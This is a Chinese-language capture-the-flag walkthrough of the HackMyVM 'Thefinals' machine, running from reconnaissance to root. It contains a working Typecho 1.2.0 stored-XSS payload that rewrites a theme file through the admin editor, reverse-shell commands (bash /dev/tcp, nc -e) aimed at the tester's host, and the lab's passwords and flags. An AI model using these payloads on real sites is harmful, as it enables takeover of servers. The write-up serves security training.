HackMyVM - Thefinals

(Updated: )
靶机
, , ,

Thefinals.

https://hackmyvm.eu/machines/machine.php?vm=Thefinals

Notes:Please wait for the IP to appear on the screen and then start. If it doesn’t boot, please enable EFI in settings.

前期踩点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜  Thefinals nmap -sP 192.168.56.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-02 05:41 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 2.35% done; ETC: 05:41 (0:00:00 remaining)
Nmap scan report for 192.168.56.1
Host is up (0.00036s latency).
MAC Address: 0A:00:27:00:00:09 (Unknown)
Nmap scan report for 192.168.56.2
Host is up (0.00025s latency).
MAC Address: 08:00:27:65:02:A9 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.56
Host is up (0.00050s latency).
MAC Address: 08:00:27:73:DF:E3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.97 seconds
1
2
3
4
5
6
7
8
9
10
11
➜  Thefinals nmap -sT -min-rate 10000 -p- 192.168.56.56  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-02 08:07 EDT
Nmap scan report for 192.168.56.56
Host is up (0.00070s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:73:DF:E3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.37 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
➜  Thefinals nmap -sT -A -T4 -O -p 22,80 192.168.56.56 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-02 08:08 EDT
Nmap scan report for 192.168.56.56
Host is up (0.00069s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey: 
|   256 42:a7:04:bb:da:b5:8e:71:7a:89:ff:a4:60:cd:4d:29 (ECDSA)
|_  256 37:32:71:ca:3f:11:41:b4:d7:90:1e:c9:7f:e8:bc:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Unix))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: THE FINALS
|_http-server-header: Apache/2.4.62 (Unix)
MAC Address: 08:00:27:73:DF:E3 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.69 ms 192.168.56.56

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds

Web 渗透

信息收集

访问HTTP并采集指纹,在下方能找到THEFINALS.hmv 添加到hosts文件

image.png

信息收集一波,先扫描一波目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
➜  Thefinals gobuster dir -u http://thefinals.hmv/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip -b 403,404,301 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://thefinals.hmv/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   403,404,301
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 15280]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
➜  Thefinals dirsearch -u http://thefinals.hmv -x 403,404,429 -e php,zip,txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, zip, txt | HTTP method: GET | Threads: 25 | Wordlist size: 10439

Output File: /root/Desktop/test/Thefinals/reports/http_thefinals.hmv/_25-05-02_22-34-19.txt

Target: http://thefinals.hmv/

[22:34:19] Starting: 
[22:34:37] 301 -  311B  - /blog  ->  http://thefinals.hmv/blog/
[22:34:37] 200 -   17KB - /blog/
[22:34:38] 200 -  820B  - /cgi-bin/printenv
[22:34:38] 200 -    1KB - /cgi-bin/test-cgi
[22:34:41] 301 -  310B  - /css  ->  http://thefinals.hmv/css/
[22:34:46] 301 -  312B  - /fonts  ->  http://thefinals.hmv/fonts/
[22:34:49] 301 -  313B  - /images  ->  http://thefinals.hmv/images/
[22:34:49] 200 -  606B  - /images/
[22:34:51] 301 -  309B  - /js  ->  http://thefinals.hmv/js/
[22:34:51] 200 -  694B  - /js/
[22:35:05] 301 -  318B  - /screenshots  ->  http://thefinals.hmv/screenshots/

Task Completed

令人感兴趣的 screenshot 目录

image.png

随便挑几张都是一样的,能知道 Typeecho 版本是 1.20

image.png

将所有图片下载下载

1
➜  Thefinals wget -r -l 1 -A png http://thefinals.hmv/screenshots/

根据大小排序后,但是也没找到有用的信息

1
2
3
4
5
6
7
8
9
10
11
12
➜  screenshots ls -al | grep -v 31556 
总计 7344
drwxr-xr-x 2 root root 12288  5月 2日 22:48 .
drwxr-xr-x 3 root root  4096  5月 2日 22:48 ..
-rw-r--r-- 1 root root 31554  5月 2日 05:28 1746178083.png
-rw-r--r-- 1 root root 31554  5月 2日 06:54 1746183243.png
-rw-r--r-- 1 root root 31554  5月 2日 07:10 1746184203.png
-rw-r--r-- 1 root root 31554  5月 2日 07:36 1746185763.png
-rw-r--r-- 1 root root 31554  5月 2日 07:54 1746186843.png
-rw-r--r-- 1 root root 31554  5月 2日 08:30 1746189003.png
-rw-r--r-- 1 root root 31554  5月 2日 08:58 1746190683.png
-rw-r--r-- 1 root root 31554  5月 2日 22:45 1746240303.png

从公开漏洞下手,直接搜索 typecho 1.2.0 可以找到存在存储型 XSS

存储型 XSS

EXP:https://www.cnblogs.com/superwinner/p/17349526.html | https://blog.csdn.net/m0_73299839/article/details/131939670 | https://blog.mo60.cn/index.php/archives/Typecho-1-2-xss2rce.html (EXP在最后一个博客里面,其他博客的EXP路径有问题)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
// EXP:shell.js
function insertIframe() {
    // 获取当前页面路径
    var urlWithoutDomain = window.location.pathname;
    // 判断页面是否为评论管理页面
    var hasManageComments = urlWithoutDomain.includes("manage-comments.php");
    var tSrc='';
    if (hasManageComments){
        // 如果是,则将路径修改为用于修改主题文件的页面地址
        tSrc=urlWithoutDomain.replace('manage-comments.php','theme-editor.php?theme=default&file=404.php');
    }else{
        // 如果不是,则直接使用主题文件修改页面地址
        tSrc='/admin/theme-editor.php?theme=default&file=404.php';
    }
    // 定义iframe元素的属性,包括id、src、width、height和onload事件
    var iframeAttributes = "<iframe id='theme_id' src='"+tSrc+"' width='0%' height='0%' onload='writeShell()'></iframe>";
    // 获取网页原始内容
    var originalContent = document.body.innerHTML;
    // 在网页末尾添加iframe元素
    document.body.innerHTML = (originalContent + iframeAttributes);
}

// 定义一个全局变量isSaved,初始值为false
var isSaved = false;

// 定义一个函数,在iframe中写入一段PHP代码并保存
function writeShell() {
    // 如果isSaved为false
    if (!isSaved) { 
        // 获取iframe内的内容区域和“保存文件”按钮元素
        var content = document.getElementById('theme_id').contentWindow.document.getElementById('content');
        var btns = document.getElementById('theme_id').contentWindow.document.getElementsByTagName('button');    
        // 获取模板文件原始内容
        var oldData = content.value;
        // 在原始内容前加入一段phpinfo代码
        content.value = ('<?php phpinfo(); ?>\n') + oldData;
        // 点击“保存文件”按钮
        btns[1].click();
        // 将isSaved设为true,表示已经完成写入操作
        isSaved = true;
    }
}
// 调用insertIframe函数,向网页中添加iframe元素和写入PHP代码的事件
insertIframe();
1
http://a.b/"></a><script/src=http://192.168.56.4:2131/shell.js></script><a/href="#

随便点开一篇文章进行评论:

image.png

提交后可以看到服务器访问我们的服务器

image.png

验证是否利用成功

image.png

RCE

修改EXP文件,写入反弹 shell 语句

1
exec("/bin/bash -c \'bash -i >& /dev/tcp/192.168.56.4/1234 0>&1\'"

发现没办法进行反弹,测试是否存在 nc

1
exec("nc 192.168.56.4 1234")

image.png

存在,再尝试构造反弹

1
exec("nc 192.168.56.4 1234 -e /bin/sh")

我们在phpinfo信息中可以看到系统是Alpine Linux 并且Alpine Linux 的默认 Shell 并不是 Bash 或者 zsh 而是 ash

最后通过弹 /bin/ash 获取 shell

1
exec("nc 192.168.56.4 1234 -e /bin/ash")

image.png

提权 - To scotty

信息收集

june 用户家目录能找到 user.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
/home/june $ cat user.flag 
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwqpppqwmwqpppqwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwqpmJx)-<!l!<-(nCwpqwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwqpQ\!'           `>jZpwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwpmt,                 luqqwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwqqzi                    .?Lpqwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwpQ[.                       "tmpwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwpmf,                           >Xpqwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwqpX>                              '{0pwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwpQ}'               l>                ;xqqwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwpwj:                -mwt"                _Jpqwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwqpX<                  "(ZbQ?.               ^|Zpwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwp0{'                     lvppvl                !vqqwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwqwr:                        .]QbZ(`               .[Qpwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwqpY~                            :jqdU+                ,fwqwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwp01'                               +Udqj:                ~Ypqwwwwwwwwwwwwwww
wwwwwwwwwwwwwwqwr;               '_:                ^|ZbQ}.               ')Opwwwwwwwwwwwwww
wwwwwwwwwwwwqpU+                >zpQ}'                !cppc!                Inqqwwwwwwwwwwww
wwwwwwwwwwwpO)`               ,fmpwqpz>                .}0bm\^                ?Cpqwwwwwwwwww
wwwwwwwwwqqx;               '[Qpqwwwwpmf,                :rqdC_                "/mpwwwwwwwww
wwwwwwwqpJ_                izqqwwwwwwwwpQ}'                _Jdqx;                >zpqwwwwwww
wwwwwwpO(`               ,fmpwwwwwwwwwwwqpz>                ^\md01'               '}0pwwwwww
wwwwwmnI               '[Qpqwwwwwwwwwwwwwwpmf,                !cqpX<                :rmwwwww
wwwwwZcvccccccccccccccvUqqwwwwwwwwwwwwwwwwwwpQccccccccccccccccvXmwpmzcccccccccccccccvcOwwwww
wwwwwwqppppppppppppppppqwwwwwwwwwwwwwwwwwwwwwqpppppppppppppppppqwwwwqppppppppppppppppqwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}

查看CMS配置文件

1
2
3
4
5
6
7
8
9
10
11
12
// config db
$db = new \Typecho\Db('Pdo_Mysql', 'typecho_');
$db->addServer(array (
  'host' => 'localhost',
  'port' => 3306,
  'user' => 'typecho_u',
  'password' => 'QLTkbviW71CSRZtGWIQdB6s',
  'charset' => 'utf8mb4',
  'database' => 'typecho_db',
  'engine' => 'InnoDB',
), \Typecho\Db::READ | \Typecho\Db::WRITE);
\Typecho\Db::set($db);

登录数据库,并寻找有趣的信息

1
2
3
4
5
6
7
8
9
10
11
12
/home/june $ mysql -u typecho_u -p
mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 4109
Server version: 11.4.5-MariaDB Alpine Linux

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
1
2
3
4
5
6
7
MariaDB [typecho_db]> select * from typecho_users;
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
| uid | name  | password                           | mail                | url                       | screenName | created    | activated  | logged     | group         | authCode                         |
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
|   1 | staff | $P$B/qMMS9FETOrEZ38X0YDY5gKJOyiwQ1 | staff@thefinals.hmv | http://thefinals.hmv/blog | staff      | 1743647281 | 1746272580 | 1746272521 | administrator | 213944c56e829e2cf7ec1de863ac3c03 |
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
1 row in set (0.000 sec)

尝试爆破后没爆破出来

猜谜游戏

june 用户家目录下 message.txt

1
2
3
/home/june $ cat message.txt 
Contestants, gear up and get ready! Who's got the KEY? Who's got the the guts?
                                                              --- This BROADCAST has been hacked by CNS

猜谜?尝试寻找于各用户相关的文件

1
$ find / -user xxxx 2>/dev/null

如何通过执行 scotty 用户可以找到如下文件

1
$ find / -user scotty 2>/dev/null
1
2
/var/log/scotty-main.err
/var/log/scotty-main.log

查看 /var/log/scotty-main.log ,表示向目标主机 192.168.56.57 的 1337 端口发送了广播数据包(UDP 或特定协议探测)。

1
2
3
4
// /var/log/scotty-main.log
Broadcast to eth0 192.168.56.57:1337
Broadcast to eth0 192.168.56.57:1337
Broadcast to eth0 192.168.56.57:1337

通过 nc 接收

1
2
3
4
/home $ nc -ulnvp 1337
listening on [::]:1337 ...
connect to [::ffff:192.168.56.57]:1337 from [::ffff:192.168.56.57]:40599 ([::ffff:192.168.56.57]:40599)
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFNd0FBQUF0emMyZ3RaVwpReU5UVXhPUUFBQUNBMXduMDk0cGhPcXNmYm8rbzNDQllpTjN4QTE2eW1LU2JYMlVZMzJ4L0FFd0FBQUpnRGMvWVVBM1AyCkZBQUFBQXR6YzJndFpXUXlOVFV4T1FBQUFDQTF3bjA5NHBoT3FzZmJvK28zQ0JZaU4zeEExNnltS1NiWDJVWTMyeC9BRXcKQUFBRUN2N2tmZW9YT1FDaTVDUklXZEhpRFQ1dXBLeVkzdlF4QWxLbXhFUXpSWkxEWENmVDNpbUU2cXg5dWo2amNJRmlJMwpmRURYcktZcEp0ZlpSamZiSDhBVEFBQUFFbkp2YjNSQWRHaGxabWx1WVd4ekxtaHRkZ0VDQXc9PQotLS0tLUVORCBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0K

image.png

看着像是 base64 编码后的,尝试解码。解码后是一串私钥。

image.png

最后通过私钥成功登陆上去

1
2
3
4
5
6
7
8
9
10
11
➜  Thefinals vim sshkey  
➜  Thefinals chmod 600 sshkey                                         
➜  Thefinals ssh scotty@thefinals.hmv -i sshkey 
The authenticity of host 'thefinals.hmv (192.168.56.57)' can't be established.
ED25519 key fingerprint is SHA256:EzmhY2U9+FvurEu825jyirPaiFVcHNA2joTW03K3glk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'thefinals.hmv' (ED25519) to the list of known hosts.

thefinals:~$ whoami
scotty

提权 - To root

信息收集

查看 sudo 权限,免密码以 root 权限执行 secret

1
2
3
4
5
6
7
8
9
thefinals:~$ sudo -l
Matching Defaults entries for scotty on thefinals:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for scotty:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User scotty may run the following commands on thefinals:
    (ALL) NOPASSWD: /sbin/secret

获得数据库密码 & root 密码

但是没找到有什么用

1
2
3
4
thefinals:~$ sudo /sbin/secret
/sbin/secret: line 2: can't create /dev/pts/99: Permission denied
thefinals:~$ ls -al /sbin/secret 
-rwx-----x    1 root     root            51 Apr 23 17:17 /sbin/secret

但是有一条信息

1
can't create /dev/pts/99: Permission denied

我们查看一下 /dev/pts/ ,只有 01

1
2
3
4
5
6
7
thefinals:~$ ls -al /dev/pts
total 0
drwxr-xr-x    2 root     root             0 May  3 13:24 .
drwxr-xr-x   14 root     root          2840 May  3 13:25 ..
crw--w----    1 apache   tty       136,   0 May  3 20:08 0
crw--w----    1 scotty   tty       136,   1 May  3 20:22 1
c---------    1 root     root        5,   2 May  3 13:24 ptmx

我们通过 python 生成伪终端后,/dev/pts/ 就多了一个

image.png

现在可以使用脚本或者手动生成

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/bin/ash
# 文件名: spawn_shells.sh
# 用途:循环生成交互式 Shell(测试或特殊场景用)

count=0
while [ $count -lt 90 ]
do
  echo "生成第 $((count+1)) 个 Shell..."
  python -c 'import pty; pty.spawn("/bin/sh")' &
  count=$((count+1))
done

echo "已完成 90 次 Shell 生成。"

生成到98后停止,然后执行 secret

1
2
thefinals:/tmp$ sudo /sbin/secret 
root:p8RuoQGTtlKLAjuF1Tpy5wX

本以为是 root 的密码,没想到是数据库的,寻找数据,获得 root 密码

1
2
3
4
5
6
7
MariaDB [secret]> select * from user;
+----+----------+-------------------------+
| id | username | password                |
+----+----------+-------------------------+
|  1 | root     | BvIpFDyB4kNbkyqJGwMzLcK |
+----+----------+-------------------------+
1 row in set (0.000 sec)
1
2
3
4
thefinals:/tmp$ su root
Password: 
/tmp # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
1
2
3
4
5
6
7
8
~ # cat root.flag 
 _____      __   __      ______
/\  __\    /\ "-.\ \    /\  ___\
\ \ \___   \ \ \-.  \   \ \___  \
 \ \____\   \ \_\\"\_\   \ \_____\
  \/____/    \/_/ \/_/    \/_____/

flag{8c5daa407626d218e962041dd8fd8f37913e56e32a6f06725da403175be0b9ff}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
~ # cat note.txt 
ssh://root@thefinals.hmv:BvIpFDyB4kNbkyqJGwMzLcK
ssh://staff@thefinals.hmv:qDCsBTj30cQyityMh3Rnyys
ssh://june@thefinals.hmv:aYTmcORsUrmwaKa7C2DBLCh
ssh://scotty@thefinals.hmv:uuUoqAETern4v5tW2iMFs47

mariadb://root@localhost:p8RuoQGTtlKLAjuF1Tpy5wX

mariadb://typecho_u@typecho_db@localhost:QLTkbviW71CSRZtGWIQdB6s

typecho://staff@thefinals.hmv:n3nPbqEOhs6eTcchyqXTXWi
typecho://june@thefinals.hmv:DihPQiQqNO75vv8zNBzLwUm

flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}
canyoureachthefinals -> sha256

flag{8c5daa407626d218e962041dd8fd8f37913e56e32a6f06725da403175be0b9ff}
youfinallyreachedthefinals -> sha256

THE FINALS is a great FPS game. A lot of inspiration comes from games. Try it on http://reachthefinals.com/